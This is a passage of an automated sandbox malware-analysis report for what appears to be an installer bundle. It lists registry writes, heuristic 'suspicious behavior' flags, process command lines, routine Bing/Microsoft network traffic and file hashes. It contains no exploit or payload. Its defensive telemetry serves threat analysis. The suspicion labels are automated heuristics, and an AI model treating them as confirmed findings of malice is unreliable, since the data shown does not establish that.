| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 5ab93e40bc2a886d9e7e6cf80656de19 |
| SHA1 | bc0a19af85729ae1e25ceff6157af814fcf22366 |
| SHA256 | 80fc5e3544a340a2b951207e6cea301745980a2f57f944c0a075f2ef44eec0a0 |
| SHA512 | 87336356d1d34d9612c74a14e19f051fbe41f1ff4a1ec7b9e74f5c0ceb3b7980730501f83c673cf3aee10ce55260ba231d6ecf227f90e72040836754002503c5 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win7-20240215-en
Max time kernel
134s
Max time network
134s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006787496bbe827249943f9a43de7ef79d00000000020000000000106600000001000020000000af8e7d28506f020f9981f602b12df57a17b63348e5499bc4d0bb0ee7f3c3c97f000000000e8000000002000020000000c0172f7c375ef770f22ab13ee17a14319d4b9757ca9aaa70a2f96834456d19442000000049402a63979e6eb4d7ec983b83fe77d2fc9a13a5a1f1471527af80e435354f244000000008e5cf8d5d4fe5cd10adc8f01e10eba0fc451dbe1f5af1ba6306d1230a17e785a95c25d78b964b5f8b6f454dc1591764d46c77e651a7422cb95602041335a36c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E8F75631-1C36-11EF-8FD2-F6A6C85E5F4F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006787496bbe827249943f9a43de7ef79d00000000020000000000106600000001000020000000d528b2fb3184ad3dd5f98402470bb3e80c2db0dff6afb2b819888a5497fca5f9000000000e80000000020000200000001499ad92402998039799f645d752a8b6dab8d1b4e6c53fa571c3374baa56d76f90000000638423d976836e60cd3f9970380cb967be55571a92459826a09c4d51b5be9c1954eaa9baac658e14021ee0c7313dc9ab79a2550f60141e87f4c366cb9903f149601fbcda0946f80b062e3927b6a5f2efbe21f7398c2dc35714e411251ec62f9c887119cd57b4e81b32145f3ecda87e1838232d1bbc5a3f09b15b23ce139af609fd0c0051cb616b5e1ad73a9fc5cad946400000009be46a127df03a09a16d2356c7bb42785c96e40c07b496397fd8ddbebabf6d66bec5a5c7d18d0577a6445663dca0771c7483348f07d45b4e98ec28325fe64449 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422982631" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 003de4bd43b0da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2932 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab4829.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ae0b67df6356caa07bc441177346fb18 |
| SHA1 | a515f710ddaa42ec264ffb6f3f6d07726707ba8f |
| SHA256 | bc8732161d82b014bc409d2d1573a455f42641a9383345a5a010b7111a70ca64 |
| SHA512 | c703cc8b36ddfcd4c7fa4a540b612e932ef65d10432d8fd72f1a612d61f4295d5eba6bd4e8d8e7b57f0c492809067aaed55573cb7181b1ecfcd624c80b0b737c |
C:\Users\Admin\AppData\Local\Temp\Tar490C.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2ba9ea4cb732418d158cbbc4dd3e9613 |
| SHA1 | 0ea2b10a4a65f6e3dfc7a0cabaa5657582d0c16f |
| SHA256 | 021d7eb4db114c0b4770112554ebd1937c55bc100388ae6f70a62f91d9a601aa |
| SHA512 | bd4065bed461682ff47b5069be372d2024bc3f0a380f11eb32ad558f769d1e86cc9fd644c48546ba1669ab386ff8d00bff67cb49da220f38429ffff866bddda5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8d9f63e1a79145b296096c53d754bf41 |
| SHA1 | d9b2e4dfe0c65171ee3d7a10567bb0be3b40238f |
| SHA256 | f588d432f91c125b0549c259a6ca9ef449bb558ed89903f2a4ae656ab8d20a5c |
| SHA512 | d19123524e51252bfc9330847141c1381f6073a3633c3b4e821effba6e3e21c17a4ec8e1293e310b1543154712c6240579b9bc85e41e2af4f67b3546bc6db2cb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b531afa5b31fbd77b8a5b49785b5eddf |
| SHA1 | b6411105cc4b71d2ef26be14861ee3d38b454b05 |
| SHA256 | 96bb87611de92ffa2f2faf338fb865efe039db184e524279bd5424614ac4db10 |
| SHA512 | bd134e57ef46828fd03c1972c62cec7418e5eeff599e00426679086cd3843f5eab3b0c6e33ef40e6755a411fef5d4ffd00226b336348e9db26a203c269f05cba |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e73f89bab6c1c82ee85be7cafe867b39 |
| SHA1 | 99d6701d9da70ec8e7731cd2ca030a2621c263af |
| SHA256 | add69f810065e979dcb851dec59894044b985904c9fe0fcc2240d978bf91d3de |
| SHA512 | 04c5b90687e63d079994df3511f38148be6893e6a226830122ed7897cc07110c5d7c17c2a10f284ad5e01d9b3272ee493b2ba48d61e5b96016ef1ff5379e64ce |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 93607cedddac70a656fd02507d92d8e7 |
| SHA1 | fbcd7f7a73c1431f654079a28c54f49aca3c9956 |
| SHA256 | eb4a880b5de41d46c21478a3f9294d12725343a82cdec30f1e6fe3bf3661d2f7 |
| SHA512 | 0cd48bb0d7743d60075a8eba91a7b930275a84ad0b8da51a2d59967abaabbe1f3bf2a03b5aad1f899336c96b2ae9354bc2801a3340c3d88284d39224f6b1eaaa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5a141f52990849244ec68502d9bf97bc |
| SHA1 | 5f3e3aad3ae02661e1055ed087462608e45e45a5 |
| SHA256 | e380a3bbea7823280b484c69521e798a2ff7ce5bd277c34d5cd60e596a7e553a |
| SHA512 | 90bc5bde48ee83729fccdae17d8faa4b58ea4932197f8e4fbc7944823f37a48bb9fd9e64509a97ed0a03896c9f559a720fc29016916da305b61b598619c63721 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 583a4f10bdd67e7131f0954cad803e92 |
| SHA1 | 72e7cb9d58738723e8426d64b2daf706a2200d77 |
| SHA256 | 0f5a31eb08b99990997d352c1b793da1bdd8f87e2c91af514693c7bf0054ecf0 |
| SHA512 | 6cadf58f3a4b27a9b9f0ffbc854898d3ae82bd5430c1e19c99e111ec61cff755b005e2252ad61ed95916965748fc0faacd8036020600165c4e103c8bf4311475 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 217d3a1068f3bd958fd8810fc8302942 |
| SHA1 | 0270f2d897a81d9a1e1bca94f23ccfe033d078c8 |
| SHA256 | 68d1b200cf74a1c392b2b72b7fc4a976fdd7cfcec592d014af9b50a63a33585f |
| SHA512 | 4315b9283eba50c6b5e58ff4d46f12fde0488de517eae3a902842f32f7d5e39b3278a7b87acf179a0ad3df678d1d970070af025ba458bb4ebb752aca4306cedb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | afd9a1bb87d849693f152ab535d33e1a |
| SHA1 | e36724155f7eb8931ca7f13ff8949e6589ad0e71 |
| SHA256 | bf97681936c1302ca7d4275d338e082370d2f234303232757606d747fa70f5f8 |
| SHA512 | 41c09c237f530f5a39935a43e45a99fb6df9e94ebc895b7b513cba345c8dfc03cf5bf6eaaab6d5ead04c844b347a1fba4e3f4449b3ec6c5796d4f1d10acca589 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6dc1fd1abd008bd731d8a878d678fa8d |
| SHA1 | dc6787cadd37412ca7f58f68e576e2ccbab26039 |
| SHA256 | e691099ecb4e4a2deeb282c1aac7524a4fb3e244c9a313f514c7548fb724ad9a |
| SHA512 | 2a69b8afa28a19559aff097050524c729ca4810f5b61d51c2f7a7c46985bd0080673e9ab98cbbdf89f539b6d3a2480a181fd2a8f0f7d5bc036e832de3ea0f0f0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0e44dc54771af37abe5d39d56067e0a0 |
| SHA1 | a3ececfc8ac85975d7a57e85cdbf5a375d7dd84d |
| SHA256 | e9d4e1b01e0a81af6d7c7a73c3da7a85f26a78b686ce18c92779b65ae23cc21b |
| SHA512 | ef404ad77aa05786c954e0a891ed7b2cbf2157a18fe71d0b5828530bf4ebde90c3ef865a37e59951fcbd584d8f3b2353b194a6410894a7a22ef31eaa0e400373 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b5591dc8527a7f8cab6c465d068d55a4 |
| SHA1 | 2ffc5e5a2e97070b648ad2430e66ee76882bade5 |
| SHA256 | eabe47c203e353d894bfe17dc9eb92d368f4070dc011507b7d4a5ede244f51d7 |
| SHA512 | 1e6e378ae0f7f377596fd58056d6615cb859e229bdd96ec018ebf7a26330d9c74a763ec6199e839f8b5f4658fbe703c88a43bd32c8969d7a5b9dd117176af644 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f9802fd7b4e37fba9988ee63ddcc3ae9 |
| SHA1 | 978d4551ebb44ba8e6a2e3cc00a44a0b0e95a701 |
| SHA256 | 64113fda9ce00e206e1e6a45af6fdb666f92740fbb315260abcc28df754c3479 |
| SHA512 | 49eacc9357648eba360b0908388af13527103140ec31b991a3bc9f22d92f2751737c928ade452413ce2fd71b2269e9d36146b4fd177066902501d91ed77ea83c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6dce574123584ba12a55c9eea354f962 |
| SHA1 | 026c211803792883c0c0f60cf823ae2e0c64549f |
| SHA256 | b80d41d798f29719b2aa5bfdace1460f818e8281ba3a89fed08c810a37d38a39 |
| SHA512 | 9576cf137a86010ca897e504716a16b9b838eb93ebea62eb3cb857dbe1bb7302bb33f63c7ce3bf86f659d97e4f3154700c3952e9515678c9c8a6b69f9703d115 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fe0666142d9202e6a2aec89eb412163f |
| SHA1 | 86d9922ba5840a72b00defbd958998e536a44a75 |
| SHA256 | 269aa46a2799e64f08791595e78864b76367542a6a556b04b109e2194228ee35 |
| SHA512 | ac167e36eccf7d858c6f04d36f9d5ce5e989df382972f71676219000a81dccfa7f53d8e29adc176a0dd8c8a1637fe7d6413ffe49d8abe897162510d78c1a56e0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c7879094c535721a6ed3744d65718c8 |
| SHA1 | 4c425b494008c4fd8b4a774b8bf1a76e1694a6c1 |
| SHA256 | d698ade34728bf7b4bc9f62b1002366558d36958b686db00f17a2bb105bddba3 |
| SHA512 | f69de2de6049aee2837100a789c21d9e0b7c167a0bdb4b6744b9046173cedbe0e45794577586b21bceff6111ab30f24bc11b945f003db1d1f81c022f047e15d6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 93b29a94bf36dcb974ea03346855d9ab |
| SHA1 | c79792351dd3e914ad7ca87043f29b844e890bec |
| SHA256 | 99b93a5c77b9f2bfd91d70a0ac90003010ded5e148d30bc929179f59444f93f3 |
| SHA512 | 753af0686ef142d00a88f0b01f48bdb608d39977ce2146553ee0ef907a88983271ba87f4cc2a80b8f03252330721f8c506b345c57288edaa9a1e0b72af3c753f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ff0c779657bf759eed0f1f19d2a1e238 |
| SHA1 | c69183a4dd826a4816dd7c65c9715afa945c52dd |
| SHA256 | d7cb72090463cfe5874d67eeeb7efdd85d1e52fd267d7947966dd9750d88d5db |
| SHA512 | a61f02f17ab5badba4e54e256489f1141b9a16f46607878188423bbccfb8b91379d5d2b4c26d799d7aa79816c70af8fe8767cfb944d989dcc81f755723ca2e2a |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
132s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20231129-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
156s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
